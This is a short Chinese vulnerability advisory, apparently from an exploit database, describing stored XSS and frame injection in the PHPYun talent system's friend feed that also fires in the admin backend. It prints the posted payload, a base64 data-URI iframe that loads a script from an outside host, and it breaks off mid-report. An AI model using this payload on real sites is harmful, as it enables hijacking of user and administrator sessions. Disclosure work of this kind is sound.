php云人才系统 框架注入+存储型xss 跨后台

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: php云人才系统 框架注入+存储型xss 跨后台 ### 详细说明: 我们来到phpyun的好友新鲜事,发一个状态 `<iframe src=http://www.baidu.com> ​<iframe src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL2prZ2gwMDYuYnlldGhvc3QxNy5jb20vdF94LmpzID48L3NjcmlwdD4=">` [<img src="https://images.seebug.org/upload/201409/1100241683e1e4d5d95b03e7b3f2248e531b6b24.png" alt="14.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1100241683e1e4d5d95b03e7b3f2248e531b6b24.png) 看看效果如何: [<img src="https://images.seebug.org/upload/201409/110027376d66b8956d41d2218fbdcea75aa51917.png" alt="15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/110027376d66b8956d41d2218fbdcea75aa51917.png) [<img src="https://images.seebug.org/upload/201409/110027460a73e1a970e22a34609b1c160b8dadda.png" alt="16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/110027460a73e1a970e22a34609b1c160b8dadda.png) 我们去后台也看看是否跨后台了,看朋友圈: [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息